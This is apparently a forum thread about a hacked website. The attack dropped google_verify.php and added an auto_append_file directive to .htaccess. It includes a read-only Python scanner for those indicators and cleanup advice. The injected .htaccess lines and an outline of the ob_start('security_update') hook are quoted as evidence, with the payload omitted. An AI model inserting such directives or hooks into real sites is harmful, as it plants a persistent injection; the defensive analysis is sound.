Problems with google_verify.php viruses and ftp passwords

A few days ago I had problems with my sites. On all ftp servers I received some php file called google_verify.php and the following text was added to my .htaccess file:

    <IfModule mod_php5.c>
        php_value auto_append_file "google_verify.php"
    </IfModule>
    <IfModule mod_php4.c>
        php_value auto_append_file "google_verify.php"
    </IfModule>

Here is the google_verify.php file:


I suspect that my computer is infected with some kind of virus that can read my ftp access settings from my ftp manager.

Does anyone know more about this virus and how I can clean my computer?

Thanks in advance

+8
passwords .htaccess ftp virus
2 answers

I am not a security specialist, but one of my sites received the same file. From my limited knowledge and research, what happened is that your site was hacked, and the google_verify.php file is part of an injection attack.

You should also check other files on your site (especially index.php / htm / html) and look for:

    ob_start("security_update");
    function security_update($buffer) {
        // long base64-encoded string omitted
        return $buffer . base64_decode('...');
    }

This virus / malware seems to be affecting several CMSs like Joomla, WordPress, CodeIgniter, etc. Additional information here and here.

+4
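
The checks described in this answer and in the question, as an added example (not code from the original posts): a read-only Python scan of a web root for the dropped google_verify.php, the auto_append_file directive in .htaccess, and the ob_start("security_update") hook. The sample tree is constructed; the 200-character base64 threshold and the extra auto_prepend_file match are assumptions that go beyond the thread.

```python
import os
import re
import tempfile

# Indicators taken from this thread; the 200-character threshold is an assumption.
DROPPED_NAME = "google_verify.php"
HTACCESS_RE = re.compile(r"php_value\s+auto_(?:append|prepend)_file", re.I)
HOOK_RE = re.compile(r"ob_start\s*\(\s*[\"']security_update[\"']", re.I)
BLOB_RE = re.compile(r"base64_decode\s*\(\s*[\"'][A-Za-z0-9+/=\s]{200,}[\"']")

def scan_webroot(root):
    """Return sorted (relative_path, reason) findings; nothing is modified."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name.lower() == DROPPED_NAME:
                findings.append((rel, "dropped file"))
            if name != ".htaccess" and not name.lower().endswith((".php", ".htm", ".html")):
                continue
            with open(path, "r", errors="replace") as fh:
                text = fh.read()
            if name == ".htaccess" and HTACCESS_RE.search(text):
                findings.append((rel, "auto_append/prepend_file directive"))
            if HOOK_RE.search(text):
                findings.append((rel, "security_update output hook"))
            if BLOB_RE.search(text):
                findings.append((rel, "long base64_decode literal"))
    return sorted(findings)

def demo():
    """Scan a constructed sample tree: one clean file plus the patterns above."""
    samples = {  # "QUJD" * 80 is constructed filler, not a real payload
        "index.php": "<?php ob_start('security_update'); $x = base64_decode('%s');" % ("QUJD" * 80),
        "about.php": "<?php echo base64_decode('aGVsbG8='); ?>",
        ".htaccess": 'php_value auto_append_file "google_verify.php"\n',
        "blog/google_verify.php": "<script>/* constructed placeholder */</script>",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
            with open(os.path.join(root, rel), "w") as fh:
                fh.write(body)
        return scan_webroot(root)

if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

To check a real site, call scan_webroot() on a downloaded copy of the web root and review each flagged file by hand before changing it.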

The best course of action:

  • change all ftp and username passwords QUICKLY
  • uninstall all FTP programs on your computer
  • run virus scan and malware scan
  • make sure your computer is clean.
  • reinstall the FTP client (clean installation - download the new software version).

Now clean your WP website:

  • install WP plugins (tac, use a scanner)
  • run plugins
  • mark infected files
  • use the FTP or WP plugin editor to clean these files
  • run the exploit scanner and tac until the site becomes clean.

Hope this helps ...

+1